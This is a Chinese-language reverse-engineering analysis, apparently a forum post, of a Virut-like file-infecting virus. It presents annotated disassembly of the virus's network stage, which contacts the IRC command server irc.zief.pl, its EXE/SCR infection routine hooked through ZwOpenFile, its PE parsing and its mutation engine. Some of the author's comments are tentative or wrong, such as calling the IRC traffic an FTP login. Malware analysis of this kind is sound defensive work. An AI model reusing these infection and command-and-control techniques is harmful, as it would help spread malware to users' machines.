7FF7163C 2BB5 9E541B00 sub esi,dword ptr ss:
7FF71642 3BB5 A2541B00 cmp esi,dword ptr ss:
7FF71648^ 0F83 71FFFFFF jnb 7FF715BF
7FF7164E 33C0 xor eax,eax
7FF71650 89B5 AA541B00 mov dword ptr ss:,esi
7FF71656 898D AE541B00 mov dword ptr ss:,ecx
7FF7165C 50 push eax
7FF7165D 50 push eax
7FF7165E 6A 03 push 0x3
7FF71660 50 push eax
7FF71661 6A 01 push 0x1
7FF71663 68 00000080 push 0x80000000
7FF71668 57 push edi
7FF71669 FF85 2C161B00 inc dword ptr ss:
7FF7166F FF95 40501B00 call dword ptr ss: ; CreateFileA
7FF71675 FF8D 2C161B00 dec dword ptr ss:
7FF7167B 83F8 FF cmp eax,-0x1
7FF7167E^ 0F84 3BFFFFFF je 7FF715BF
7FF71684 8985 96541B00 mov dword ptr ss:,eax
7FF7168A 8B43 3C mov eax,dword ptr ds:
7FF7168D 03C3 add eax,ebx
7FF7168F 0FB750 14 movzx edx,word ptr ds:
7FF71693 0FB748 06 movzx ecx,word ptr ds:
7FF71697 8D4402 18 lea eax,dword ptr ds:
7FF7169B 8B50 0C mov edx,dword ptr ds:
7FF7169E 3BD6 cmp edx,esi
7FF716A0 77 07 ja short 7FF716A9
7FF716A2 0350 10 add edx,dword ptr ds:
7FF716A5 3BD6 cmp edx,esi
7FF716A7 77 16 ja short 7FF716BF
7FF716A9 83C0 28 add eax,0x28
7FF716AC^ E2 ED loopd short 7FF7169B
7FF716AE FFB5 96541B00 push dword ptr ss:
7FF716B4 FF95 04501B00 call dword ptr ss:
7FF716BA^ E9 00FFFFFF jmp 7FF715BF
7FF716BF 2B70 0C sub esi,dword ptr ds:
7FF716C2 6A 00 push 0x0
7FF716C4 0370 14 add esi,dword ptr ds:
7FF716C7 6A 00 push 0x0
7FF716C9 56 push esi
7FF716CA FFB5 96541B00 push dword ptr ss:
7FF716D0 FF95 B4501B00 call dword ptr ss: ; SetFilePointer
7FF716D6 8B85 AE541B00 mov eax,dword ptr ss:
7FF716DC C1E0 02 shl eax,0x2
7FF716DF 50 push eax
7FF716E0 50 push eax
7FF716E1 6A 00 push 0x0
7FF716E3 FF95 90501B00 call dword ptr ss: ; GlobalAlloc
7FF716E9 8985 9A541B00 mov dword ptr ss:,eax
7FF716EF 8BD4 mov edx,esp
7FF716F1 6A 00 push 0x0
7FF716F3 52 push edx
7FF716F4 FF32 push dword ptr ds:
7FF716F6 50 push eax
7FF716F7 FFB5 96541B00 push dword ptr ss:
7FF716FD FF95 A8501B00 call dword ptr ss: ; ReadFile
7FF71703 8B85 96541B00 mov eax,dword ptr ss:
7FF71709 890424 mov dword ptr ss:,eax
7FF7170C FF95 04501B00 call dword ptr ss: ; 关闭句柄
7FF71712 8B53 3C mov edx,dword ptr ds:
7FF71715 8BB5 9A541B00 mov esi,dword ptr ss:
7FF7171B 8B541A 34 mov edx,dword ptr ds:
7FF7171F 8BFE mov edi,esi
7FF71721 2B95 9E541B00 sub edx,dword ptr ss:
7FF71727 8B8D AE541B00 mov ecx,dword ptr ss:
7FF7172D AD lods dword ptr ds:
7FF7172E 2BC2 sub eax,edx
7FF71730 AB stos dword ptr es:
7FF71731^ E2 FA loopd short 7FF7172D ; 这里是重设SSDT?
7FF71733 8D85 AF241B00 lea eax,dword ptr ss:
关于内核方面的东西是我的了解的不是很多。。这里有点迷糊。
7FF71BD3 8DBD 10511B00 lea edi,dword ptr ss:
7FF71BD9 E8 4AF1FFFF call 7FF70D28 ; 填充关于网络的函数
7FF71BDE E8 0C000000 call 7FF71BEF
7FF7411071A26A55ws2_32.WSAStartup
7FF7411471A23E2Bws2_32.closesocket
7FF7411871A24A07ws2_32.connect
7FF7411C71A25355ws2_32.gethostbyname
7FF7412071A42E70wsock32.recv
7FF7412471A24C27ws2_32.send
7FF7412871A24211ws2_32.socket
填写了这些api想想就知道要下载东西了。
7FF71C0A 8DBD 2C511B00 lea edi,dword ptr ss:
7FF71C10 E8 13F1FFFF call 7FF70D28
7FF71C15 83BD 30511B00 0>cmp dword ptr ss:,0x0
再次填充
7FF7412C76694D8Cwininet.InternetCloseHandle
7FF74130766A5C4Ewininet.InternetGetConnectedState
7FF741347669578Ewininet.InternetOpenA
7FF7413876695A5Awininet.InternetOpenUrlA
7FF7413C766982EAwininet.InternetReadFile
7FF71C03 8DB5 381F1B00 lea esi,dword ptr ss:
7FF71C09 59 pop ecx
7FF71C0A 8DBD 2C511B00 lea edi,dword ptr ss:
7FF71C10 E8 13F1FFFF call 7FF70D28
7FF71C15 83BD 30511B00 0>cmp dword ptr ss:,0x0
7FF71C1C 0F84 4C020000 je 7FF71E6E
7FF71C22 81EC 90010000 sub esp,0x190
7FF71C28 54 push esp
7FF71C29 68 01010000 push 0x101
7FF71C2E FF95 10511B00 call dword ptr ss: ;WSAStartup
7FF71C34 81C4 90010000 add esp,0x190
7FF71C3A 50 push eax
7FF71C3B 8BD4 mov edx,esp
7FF71C3D 6A 00 push 0x0
7FF71C3F 52 push edx
7FF71C40 FF95 30511B00 call dword ptr ss: ; IntetnetGetConnectedState
7FF71C46 85C0 test eax,eax
7FF71C48 59 pop ecx
7FF71C49 75 0D jnz short 7FF71C58
7FF71C4B 68 88130000 push 0x1388
7FF71C50 FF95 C0501B00 call dword ptr ss: ; sleep
7FF71C56^ EB E2 jmp short 7FF71C3A ; 不断查询网络状态
7FF71C58 66:C785 1F281B0>mov word ptr ss:,0x5000
7FF71C61 83A5 21281B00 0>and dword ptr ss:,0x0
7FF71C68 8DBD 25281B00 lea edi,dword ptr ss:
7FF71C6E 57 push edi
7FF71C6F FF95 1C511B00 call dword ptr ss: ; gethostbyname
7FF71C75 85C0 test eax,eax ; irc.zief.pl
7FF71C77 75 24 jnz short 7FF71C9D ; 开始解析ip了
7FF71C79 57 push edi
7FF71C7A FF95 38501B00 call dword ptr ss:
7FF71C80 8D7C38 01 lea edi,dword ptr ds:
7FF71C84 803F 00 cmp byte ptr ds:,0x0
7FF71C87^ 75 E5 jnz short 7FF71C6E
7FF71C89 E8 11FCFFFF call 7FF7189F
7FF71C8E 83BD 21281B00 0>cmp dword ptr ss:,0x0
7FF71C95 0F84 BA010000 je 7FF71E55
7FF71C9B EB 0D jmp short 7FF71CAA
7FF71C9D 8B40 0C mov eax,dword ptr ds:
7FF71CA0 8B00 mov eax,dword ptr ds:
7FF71CA2 FF30 push dword ptr ds:
7FF71CA4 8F85 21281B00 pop dword ptr ss:
7FF71CAA 6A 00 push 0x0
7FF71CAC 6A 01 push 0x1
7FF71CAE 6A 02 push 0x2
7FF71CB0 FF95 28511B00 call dword ptr ss: ; socket
7FF71CB6 83F8 FF cmp eax,-0x1 ; 建立套接字
7FF71CB9 0F84 96010000 je 7FF71E55
7FF71CBF 93 xchg eax,ebx
7FF71CC0 8D95 1D281B00 lea edx,dword ptr ss:
7FF71CC6 6A 10 push 0x10
7FF71CC8 52 push edx
7FF71CC9 53 push ebx
7FF71CCA FF95 18511B00 call dword ptr ss: ; connect
7FF71CD0 85C0 test eax,eax
7FF71CD2 0F85 76010000 jnz 7FF71E4E
7FF71CD8 8DBD 6A281B00 lea edi,dword ptr ss:
7FF71CDE B1 08 mov cl,0x8
7FF71CE0 E8 57F5FFFF call 7FF7123C
7FF71CE5 68 94000000 push 0x94
7FF71CEA 5E pop esi
7FF71CEB 2BE6 sub esp,esi
7FF71CED 893424 mov dword ptr ss:,esi
7FF71CF0 54 push esp
7FF71CF1 FF95 84501B00 call dword ptr ss: ; GetVersionExA
7FF71CF7 8DBD 78281B00 lea edi,dword ptr ss:
7FF71CFD B1 01 mov cl,0x1
7FF71CFF E8 38F5FFFF call 7FF7123C
7FF71D04 8D95 65281B00 lea edx,dword ptr ss:
7FF71D0A 6A 00 push 0x0
7FF71D0C 68 14000000 push 0x14
7FF71D11 52 push edx
7FF71D12 53 push ebx
7FF71D13 FF95 24511B00 call dword ptr ss: ; send
发送的是
7FF718654E 49 43 4B 20 70 6E 71 79 65 61 65 6B 0A 55 53NICK pnqyeaek.US
7FF7187545 52 20 ER
看起来像用户名密码,应是个FPT连接
7FF71D72 57 push edi
7FF71D73 FF95 20501B00 call dword ptr ss:
7FF71D79 81C4 B0000000 add esp,0xB0
7FF71D7F 6A 00 push 0x0
7FF71D81 50 push eax
7FF71D82 57 push edi
7FF71D83 53 push ebx
7FF71D84 FF95 24511B00 call dword ptr ss: ; ws2_32.send
7FF71D8A 8B8D 1C161B00 mov ecx,dword ptr ss:
7FF7416230 32 30 35 30 31 20 2E 20 2E 20 3A 23 64 63 31020501 . . :#dc1
7FF7417262 32 30 32 39 30 20 53 65 72 76 69 63 65 20 50b20290 Service P
7FF7418261 63 6B 20 33 0A 4A 4F 49 4E 20 00 5C 00 69 00ack 3.JOIN .\.i.
7FF7419264 00 62 00 74 00 56 00 74 d.b.t.V.t
发送系统版本
7FF71DC3 8DB5 62511B00 lea esi,dword ptr ss:
7FF71DC9 8D8D 61531B00 lea ecx,dword ptr ss:
7FF71DCF 2BCE sub ecx,esi
7FF71DD1 6A 00 push 0x0
7FF71DD3 51 push ecx
7FF71DD4 56 push esi
7FF71DD5 53 push ebx
7FF71DD6 FF95 20511B00 call dword ptr ss: ; recv
7FF71DDC 83F8 00 cmp eax,0x0
7FF71DDF 7E 6D jle short 7FF71E4E
7FF71DE1 91 xchg eax,ecx
然后就开始循环了
----------------------------------------------------我又是分割线------------------------------------------------------------------------------------------------------------------------------------
下面就是感染部分。
用od加载explorer再被hook的ZwOpenFile处设置好断点
7FF82792 C685 61531B00 0>mov byte ptr ss:,0x0
7FF82799 3D 45584500 cmp eax,0x455845 ; EXE
7FF8279E 74 0C je short 7FF827AC
7FF827A0 3D 53435200 cmp eax,0x524353 ; SCR
7FF827A5 74 05 je short 7FF827AC
7FF827A7^ E9 C2F9FFFF jmp 7FF8216E
7FF827AC 8B03 mov eax,dword ptr ds:
7FF827AE 3D 57494E43 cmp eax,0x434E4957 ; WINC
7FF827B3^ 74 F2 je short 7FF827A7
7FF827B5 3D 5743554E cmp eax,0x4E554357 ; WCUN
7FF827BA^ 74 EB je short 7FF827A7
7FF827BC 3D 57433332 cmp eax,0x32334357 ; WC32
7FF827C1^ 74 E4 je short 7FF827A7
7FF827C3 3D 4F545350 cmp eax,0x5053544F ; OTSP
7FF827C8^ 74 DD je short 7FF827A7
这里有个扩展名过滤只感染EXE和SCR
并对文件开头进行了过滤
7FF81FE3 8DB5 62531B00 lea esi,dword ptr ss:
7FF81FE9 85DB test ebx,ebx
7FF81FEB 74 25 je short 7FF82012
7FF81FED 56 push esi
7FF81FEE FF95 60501B00 call dword ptr ss: ; GetFileAttributesA
7FF81FF4 83F8 FF cmp eax,-0x1
7FF81FF7 74 19 je short 7FF82012
7FF81FF9 8985 66541B00 mov dword ptr ss:,eax
7FF81FFF 6A 00 push 0x0
7FF82001 56 push esi
7FF82002 FF95 B0501B00 call dword ptr ss: ; SetFileAttributesA
7FF82008 85C0 test eax,eax
7FF8200A 74 06 je short 7FF82012
7FF8200C FE85 06551B00 inc byte ptr ss:
7FF82012 2BC0 sub eax,eax
7FF82014 50 push eax
7FF82015 50 push eax
7FF82016 6A 03 push 0x3
7FF82018 50 push eax
7FF82019 0BDB or ebx,ebx
7FF8201B 75 12 jnz short 7FF8202F
7FF8201D 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF82024 75 09 jnz short 7FF8202F
7FF82026 6A 03 push 0x3
7FF82028 68 00000080 push 0x80000000
7FF8202D EB 07 jmp short 7FF82036
7FF8202F 6A 01 push 0x1
7FF82031 68 000000C0 push 0xC0000000
7FF82036 56 push esi
7FF82037 FF95 40501B00 call dword ptr ss: ; CreateFileA
7FF8203D 83F8 FF cmp eax,-0x1
7FF82040 0F84 A2130000 je 7FF833E8
7FF82046 8985 6A541B00 mov dword ptr ss:,eax
7FF8204C 85DB test ebx,ebx
7FF8204E 74 21 je short 7FF82071
7FF82050 8D8D 6E541B00 lea ecx,dword ptr ss:
7FF82056 8D95 76541B00 lea edx,dword ptr ss:
7FF8205C 51 push ecx
7FF8205D 52 push edx
7FF8205E 6A 00 push 0x0
7FF82060 50 push eax
7FF82061 FF95 68501B00 call dword ptr ss:
7FF82067 85C0 test eax,eax
7FF82069 74 06 je short 7FF82071
7FF8206B FE85 07551B00 inc byte ptr ss:
7FF82071 6A 00 push 0x0
7FF82073 FFB5 6A541B00 push dword ptr ss:
7FF82079 FF95 64501B00 call dword ptr ss: ; 获取文件大小
7FF8207F 83F8 FF cmp eax,-0x1
7FF82082 0F84 1C130000 je 7FF833A4
7FF82088 8985 7E541B00 mov dword ptr ss:,eax
7FF8208E 33C9 xor ecx,ecx
7FF82090 03C3 add eax,ebx
7FF82092 51 push ecx
7FF82093 50 push eax
7FF82094 51 push ecx
7FF82095 0BDB or ebx,ebx
7FF82097 75 09 jnz short 7FF820A2
7FF82099 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF820A0 74 04 je short 7FF820A6
7FF820A2 6A 04 push 0x4
7FF820A4 EB 02 jmp short 7FF820A8
7FF820A6 6A 02 push 0x2
7FF820A8 51 push ecx
7FF820A9 FFB5 6A541B00 push dword ptr ss:
7FF820AF FF95 44501B00 call dword ptr ss: ; CreateFileMappingA
7FF820B5 85C0 test eax,eax
7FF820B7 0F84 E7120000 je 7FF833A4
7FF820BD 33C9 xor ecx,ecx
7FF820BF 8985 82541B00 mov dword ptr ss:,eax
7FF820C5 51 push ecx
7FF820C6 51 push ecx
7FF820C7 51 push ecx
7FF820C8 85DB test ebx,ebx
7FF820CA 0BDB or ebx,ebx
7FF820CC 75 09 jnz short 7FF820D7
7FF820CE 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF820D5 74 07 je short 7FF820DE
7FF820D7 68 1F000F00 push 0xF001F
7FF820DC EB 05 jmp short 7FF820E3
7FF820DE 68 1D000F00 push 0xF001D
7FF820E3 50 push eax
7FF820E4 FF95 98501B00 call dword ptr ss: ; MapViewOfFile
7FF820EA 85C0 test eax,eax
7FF820EC 0F84 81120000 je 7FF83373
建立文件内存映射
7FF8281C 8BB5 86541B00 mov esi,dword ptr ss:
7FF82822 66:813E 4D5A cmp word ptr ds:,0x5A4D ; 检测dos头
7FF82827 0F85 240B0000 jnz 7FF83351
7FF8282D 8B5E 3C mov ebx,dword ptr ds:
7FF82830 81FB FFFF0000 cmp ebx,0xFFFF
7FF82836 0F87 150B0000 ja 7FF83351
7FF8283C 03DE add ebx,esi
7FF8283E 66:813B 5045 cmp word ptr ds:,0x4550 ; 检测pe头
7FF82843 0F85 080B0000 jnz 7FF83351
7FF82849 F743 16 0020000>test dword ptr ds:,0x2000 ; Characteristics
7FF82850 0F85 FB0A0000 jnz 7FF83351
7FF82856 F643 5C 02 test byte ptr ds:,0x2 ; SubSystem
7FF8285A 0F84 F10A0000 je 7FF83351
7FF82860 8B85 81421B00 mov eax,dword ptr ss:
7FF82131 0FB74B 06 movzx ecx,word ptr ds: ; 获取节的数目
7FF82135 F9 stc
7FF82136 E3 36 jecxz short 7FF8216E
7FF82138 8D53 18 lea edx,dword ptr ds:
7FF8213B 0FB743 14 movzx eax,word ptr ds:
7FF8213F 03D0 add edx,eax ; 定位到节头
7FF82141 49 dec ecx
7FF82142 6BC1 28 imul eax,ecx,0x28 ; 节的头大小
7FF82145 03D0 add edx,eax
7FF82147 813A 5F77696E cmp dword ptr ds:,0x6E69775F ; 算出最后一个节头
7FF8214D F9 stc ; _win
7FF8214E 74 1E je short 7FF8216E ; 比较是不是_win
7FF82150 49 dec ecx
7FF82151 837A 0C 01 cmp dword ptr ds:,0x1
7FF82155^ 72 DF jb short 7FF82136
7FF82157 8B4B 3C mov ecx,dword ptr ds: ; 文件对齐
7FF8215A 8B42 14 mov eax,dword ptr ds: ; 物理偏移
7FF8215D 0342 10 add eax,dword ptr ds: ; RawSize
7FF82160 8D4448 FF lea eax,dword ptr ds:
7FF82164 F7D9 neg ecx
7FF82166 23C1 and eax,ecx ; 加上一个对齐大小
7FF82874 /0F82 D70A0000 jb 7FF83351
7FF8287A |8B42 08 mov eax,dword ptr ds: ; 虚拟地址
7FF8287D |2B42 10 sub eax,dword ptr ds: ; RawSize
7FF82880 |73 02 jnb short 7FF82884
7FF82882 |33C0 xor eax,eax
7FF82884 |8985 8E541B00 mov dword ptr ss:,eax
7FF8288A |C785 1C1B1B00 E>mov dword ptr ss:,0x43EC
7FF820F9 8B85 1C1B1B00 mov eax,dword ptr ss:
7FF820FF 8B4B 38 mov ecx,dword ptr ds: ; SectionAlignment
7FF82102 05 E4060000 add eax,0x6E4
7FF82107 33D2 xor edx,edx
7FF82109 8D4401 FF lea eax,dword ptr ds:
7FF8210D F7F1 div ecx
7FF8210F F7E1 mul ecx ; 算要几个对齐
7FF82111 8985 92541B00 mov dword ptr ss:,eax ; 保存最终大小
7FF82117 8B4B 3C mov ecx,dword ptr ds:
7FF8211A 8B85 1C1B1B00 mov eax,dword ptr ss:
7FF82120 33D2 xor edx,edx
7FF82122 8D4401 FF lea eax,dword ptr ds:
7FF82126 F7F1 div ecx
7FF82128 F7E1 mul ecx
7FF8212A 8985 8A541B00 mov dword ptr ss:,eax ; 保存最终大小
7FF82130 C3 retn
7FF8335A 83BD 6A541B00 0>cmp dword ptr ss:,0x0
7FF83361 0F84 9D000000 je 7FF83404
7FF83367 FFB5 86541B00 push dword ptr ss:
7FF8336D FF95 C4501B00 call dword ptr ss: ; UnmapViewOfFile
7FF83373 FFB5 82541B00 push dword ptr ss:
7FF83379 FF95 04501B00 call dword ptr ss: ; 关闭句柄
7FF8337F 80BD 07551B00 0>cmp byte ptr ss:,0x0
7FF83386 74 1C je short 7FF833A4
7FF83388 8D8D 6E541B00 lea ecx,dword ptr ss:
这里获取了一些必要参数并且算出需要的新大小,关闭句柄
7FF81FE9 85DB test ebx,ebx
7FF81FEB 74 25 je short 7FF82012
7FF81FED 56 push esi
7FF81FEE FF95 60501B00 call dword ptr ss: ; GetFileAttributesA
7FF81FF4 83F8 FF cmp eax,-0x1
7FF81FF7 74 19 je short 7FF82012
7FF81FF9 8985 66541B00 mov dword ptr ss:,eax
7FF81FFF 6A 00 push 0x0
7FF82001 56 push esi
7FF82002 FF95 B0501B00 call dword ptr ss: ; SetFileAttributesA
7FF82008 85C0 test eax,eax
7FF8200A 74 06 je short 7FF82012
7FF8200C FE85 06551B00 inc byte ptr ss:
7FF82012 2BC0 sub eax,eax
7FF82014 50 push eax
7FF82015 50 push eax
7FF82016 6A 03 push 0x3
7FF82018 50 push eax
7FF82019 0BDB or ebx,ebx
查询和设置文件属性
7FF8201B /75 12 jnz short 7FF8202F
7FF8201D |83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF82024 |75 09 jnz short 7FF8202F
7FF82026 |6A 03 push 0x3
7FF82028 |68 00000080 push 0x80000000
7FF8202D |EB 07 jmp short 7FF82036
7FF8202F \6A 01 push 0x1
7FF82031 68 000000C0 push 0xC0000000
7FF82036 56 push esi
7FF82037 FF95 40501B00 call dword ptr ss: ; CreateFileA
7FF8203D 83F8 FF cmp eax,-0x1
7FF82040 0F84 A2130000 je 7FF833E8
7FF82046 8985 6A541B00 mov dword ptr ss:,eax
7FF8204C 85DB test ebx,ebx
7FF8204E 74 21 je short 7FF82071
7FF82050 8D8D 6E541B00 lea ecx,dword ptr ss:
7FF82056 8D95 76541B00 lea edx,dword ptr ss:
7FF8205C 51 push ecx
7FF8205D 52 push edx
7FF8205E 6A 00 push 0x0
7FF82060 50 push eax
7FF82061 FF95 68501B00 call dword ptr ss:
7FF82067 85C0 test eax,eax
7FF82069 74 06 je short 7FF82071
7FF8206B FE85 07551B00 inc byte ptr ss:
7FF82071 6A 00 push 0x0
7FF82073 FFB5 6A541B00 push dword ptr ss:
7FF82079 FF95 64501B00 call dword ptr ss: ; 获取文件大小
7FF8207F 83F8 FF cmp eax,-0x1
7FF82082 0F84 1C130000 je 7FF833A4
7FF82088 8985 7E541B00 mov dword ptr ss:,eax
7FF8208E 33C9 xor ecx,ecx
7FF82090 03C3 add eax,ebx
7FF82092 51 push ecx
7FF82093 50 push eax
7FF82094 51 push ecx
7FF82095 0BDB or ebx,ebx
7FF82097 75 09 jnz short 7FF820A2
7FF82099 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF820A0 74 04 je short 7FF820A6
7FF820A2 6A 04 push 0x4
7FF820A4 EB 02 jmp short 7FF820A8
7FF820A6 6A 02 push 0x2
7FF820A8 51 push ecx
7FF820A9 FFB5 6A541B00 push dword ptr ss:
7FF820AF FF95 44501B00 call dword ptr ss: ; CreateFileMappingA
7FF820B5 85C0 test eax,eax
7FF820B7 0F84 E7120000 je 7FF833A4
7FF820BD 33C9 xor ecx,ecx
7FF820BF 8985 82541B00 mov dword ptr ss:,eax
7FF820C5 51 push ecx
7FF820C6 51 push ecx
7FF820C7 51 push ecx
7FF820C8 85DB test ebx,ebx
7FF820CA 0BDB or ebx,ebx
7FF820CC 75 09 jnz short 7FF820D7
接下来再次建立映射。
接下来是个语句扫描标记的部分
7FF828E2 66:8367 02 00 and word ptr ds:,0x0
7FF828E7 6A 03 push 0x3 ; 语句数量
7FF828E9 58 pop eax
7FF828EA 66:8327 00 and word ptr ds:,0x0 ; 初始化
7FF828EE 66:C747 06 0080 mov word ptr ds:,0x8000 ; 初始话
7FF828F4 E8 2FE9FFFF call 7FF81228
7FF828F9 8D4A 03 lea ecx,dword ptr ds:
7FF828FC 51 push ecx
7FF828FD 8D85 0A101B00 lea eax,dword ptr ss:
7FF82903 8D8D 4A101B00 lea ecx,dword ptr ss:
7FF82909 8D95 E0111B00 lea edx,dword ptr ss:
7FF8290F 3BF0 cmp esi,eax ; 比较是不是特殊区域
7FF82911 75 08 jnz short 7FF8291B
7FF82913 68 05000000 push 0x5
7FF82918 59 pop ecx
7FF82919 EB 37 jmp short 7FF82952
7FF8291B 3BF1 cmp esi,ecx ; 特殊区域
7FF8291D 75 05 jnz short 7FF82924
7FF8291F 6A 02 push 0x2
7FF82921 59 pop ecx
7FF82922 EB 2E jmp short 7FF82952
7FF82924 3BF2 cmp esi,edx
7FF82926 75 09 jnz short 7FF82931
7FF82928 6A 05 push 0x5
7FF8292A C647 07 00 mov byte ptr ds:,0x0
7FF8292E 59 pop ecx
7FF8292F EB 21 jmp short 7FF82952
7FF82931 8A06 mov al,byte ptr ds: ; 获取opcode
7FF82933 3C E9 cmp al,0xE9 ; 长跳
7FF82935 74 0C je short 7FF82943
7FF82937 3C EB cmp al,0xEB ; 短跳
7FF82939 74 08 je short 7FF82943
7FF8293B 3C C2 cmp al,0xC2 ; retn X
7FF8293D 74 04 je short 7FF82943
7FF8293F 3C C3 cmp al,0xC3 ; retn
7FF82941 75 06 jnz short 7FF82949
7FF82943 C647 07 80 mov byte ptr ds:,0x80 ; 标记
7FF82947 EB 04 jmp short 7FF8294D
7FF82949 C647 07 00 mov byte ptr ds:,0x0
7FF8294D E8 C2120000 call 7FF83C14 ; 反汇编长度引擎
7FF82952 66:010F add word ptr ds:,cx ; 总共的字节数
7FF82955 8D85 E8111B00 lea eax,dword ptr ss: ; 获得结束区域
7FF8295B 03F1 add esi,ecx
7FF8295D 3BF0 cmp esi,eax
7FF8295F 59 pop ecx
7FF82960 73 2F jnb short 7FF82991
7FF82962^ E2 98 loopd short 7FF828FC
7FF82964 FE85 23171B00 inc byte ptr ss: ; 总共的语句块
7FF8296A 80BD 23171B00 6>cmp byte ptr ss:,0x63
7FF82971 77 13 ja short 7FF82986
7FF82973 66:8B47 02 mov ax,word ptr ds: ; 累计数量
7FF82977 66:0307 add ax,word ptr ds: ; 这次的数量
7FF8297A 83C7 08 add edi,0x8
7FF8297D 66:8947 02 mov word ptr ds:,ax
7FF82981^ E9 61FFFFFF jmp 7FF828E7
7FF82986 FE85 E8381B00 inc byte ptr ss:
7FF8298C^ E9 37FFFFFF jmp 7FF828C8
以三个汇编语句为一组记录。识别jmp,retn记录。
存入这样一个结构体中
virutcode struct
sumopcodesize dw ?
thiscodesziedw ?
jmpretflag dw ?
unknow dw ?
virutcode ends
7FF82AA1 FF95 30501B00 call dword ptr ss: ; 比较导入dll有没有kernel32.dll
7FF82AA7 85C0 test eax,eax
7FF82AA9 5A pop edx
7FF82AAA 74 05 je short 7FF82AB1
7FF82B04 03B5 86541B00 add esi,dword ptr ss: ; 得到原始OEP处
7FF82B0A FFB5 E6541B00 push dword ptr ss:
7FF82B10 AC lods byte ptr ds:
7FF82B11 3C E8 cmp al,0xE8 ; 检测是不是跳转
7FF82B13 75 3F jnz short 7FF82B54
7FF82B4F 8B40 02 mov eax,dword ptr ds:
7FF82B52 EB 28 jmp short 7FF82B7C
7FF82B54 3C FF cmp al,0xFF ; 寻找ff
7FF82B56 75 0A jnz short 7FF82B62
7FF82B58 803E 15 cmp byte ptr ds:,0x15 ; 15
7FF82B5B 75 05 jnz short 7FF82B62
这里在找ff15,ff25什么的
做hook本实例是ff15
7FF82BAD^\73 B3 jnb short 7FF82B62
7FF82BAF 8F85 E6541B00 pop dword ptr ss:
7FF82BB5 FE85 10551B00 inc byte ptr ss:
7FF82BBB 814A 24 600000E>or dword ptr ds:,0xE0000060 ; 设置节属性
接下来是变异引擎部分
7FF82C47 50 push eax
7FF82C48 B0 02 mov al,0x2
7FF82C4A E8 D9E5FFFF call 7FF81228 ; 产生随机数
7FF82C4F 0AD2 or dl,dl
7FF82C51 0F85 4C010000 jnz 7FF82DA3
7FF82C57 8BC6 mov eax,esi
7FF82C59 2BC5 sub eax,ebp ; 算出偏移
7FF82C5B 3D 0A101B00 cmp eax,0x1B100A ; 比较偏移
7FF82C60 75 0B jnz short 7FF82C6D
7FF82C62 68 05000000 push 0x5
7FF82C67 59 pop ecx
7FF82C68 E9 25010000 jmp 7FF82D92
7FF82C6D 3D 4A101B00 cmp eax,0x1B104A ; 比较偏移
7FF82C72 75 08 jnz short 7FF82C7C
7FF82C74 6A 02 push 0x2
7FF82C76 59 pop ecx
7FF82C77 E9 16010000 jmp 7FF82D92
7FF82C7C 3D E0111B00 cmp eax,0x1B11E0 ; 比较偏移这些应该是特殊部分
7FF82C81 75 08 jnz short 7FF82C8B
7FF82C83 6A 05 push 0x5
7FF82C85 59 pop ecx
7FF82C86 E9 07010000 jmp 7FF82D92
7FF82C8B 80BD 10551B00 F>cmp byte ptr ss:,0xFF
7FF82C92 74 6C je short 7FF82D00 ; 比较偏移这些应该是特殊部分
7FF82C94 3D DB101B00 cmp eax,0x1B10DB
7FF82C99 72 65 jb short 7FF82D00 ; 比较偏移这些应该是特殊部分
7FF82C9B 3D E3101B00 cmp eax,0x1B10E3
7FF82CA0 73 5E jnb short 7FF82D00 ; 比较偏移这些应该是特殊部分
7FF82CA2 807E 01 5C cmp byte ptr ds:,0x5C
7FF82CA6 75 58 jnz short 7FF82D00
7FF82CA8 AD lods dword ptr ds:
7FF82CA9 8BD7 mov edx,edi
7FF82CAB 8985 281B1B00 mov dword ptr ss:,eax
7FF82CB1 AA stos byte ptr es:
7FF82CB2 B0 1D mov al,0x1D
7FF82CB4 2B95 CE541B00 sub edx,dword ptr ss:
7FF82CBA AA stos byte ptr es:
7FF82CBB 6A 04 push 0x4
7FF82CBD 8B85 02551B00 mov eax,dword ptr ss:
7FF82CC3 3B95 201B1B00 cmp edx,dword ptr ss:
7FF82CC9 76 06 jbe short 7FF82CD1
7FF82CCB 81EA 343D0000 sub edx,0x3D34
7FF82CD1 59 pop ecx
7FF82CD2 AB stos dword ptr es:
7FF82CD3 8995 241B1B00 mov dword ptr ss:,edx
7FF82CD9 0FB395 441A1B00 btr dword ptr ss:,edx
7FF82CE0 42 inc edx
7FF82CE1^ E2 F6 loopd short 7FF82CD9
7FF82CE3 8B0424 mov eax,dword ptr ss:
7FF82CE6 66:8384C5 2A171>add word ptr ss:,0x4
7FF82CEF 836C24 04 04 sub dword ptr ss:,0x4
7FF82CF4 B1 02 mov cl,0x2
7FF82CF6 E9 BA000000 jmp 7FF82DB5
7FF82CFB E9 92000000 jmp 7FF82D92
7FF82D00 3D 73111B00 cmp eax,0x1B1173
7FF82D05 0F85 82000000 jnz 7FF82D8D
7FF82D0B 80BD 10551B00 0>cmp byte ptr ss:,0x0
7FF82D12 72 79 jb short 7FF82D8D
7FF82D14 80BD 10551B00 0>cmp byte ptr ss:,0x2
7FF82D1B 73 70 jnb short 7FF82D8D
7FF82D1D 80BD 10551B00 0>cmp byte ptr ss:,0x0
7FF82D24 75 06 jnz short 7FF82D2C
7FF82D26 89BD 12551B00 mov dword ptr ss:,edi
7FF82D2C 0FB685 11551B00 movzx eax,byte ptr ss:
7FF82D33 6A 07 push 0x7
7FF82D35 6BC0 03 imul eax,eax,0x3
7FF82D38 59 pop ecx
7FF82D39 8B95 FE541B00 mov edx,dword ptr ss:
7FF82D3F 80BD 10551B00 0>cmp byte ptr ss:,0x1
7FF82D46 75 05 jnz short 7FF82D4D
7FF82D48 83C2 04 add edx,0x4
7FF82D4B 2BD0 sub edx,eax
7FF82D4D 03C8 add ecx,eax
7FF82D4F B0 C6 mov al,0xC6
7FF82D51 0285 11551B00 add al,byte ptr ss:
7FF82D57 AA stos byte ptr es:
7FF82D58 B0 05 mov al,0x5
7FF82D5A AA stos byte ptr es:
7FF82D5B 8BC2 mov eax,edx
7FF82D5D 0343 34 add eax,dword ptr ds:
7FF82D60 AB stos dword ptr es:
7FF82D61 0395 E6541B00 add edx,dword ptr ss:
7FF82D67 0395 86541B00 add edx,dword ptr ss:
7FF82D6D 8B02 mov eax,dword ptr ds:
7FF82D6F 80BD 11551B00 0>cmp byte ptr ss:,0x0
7FF82D76 75 03 jnz short 7FF82D7B
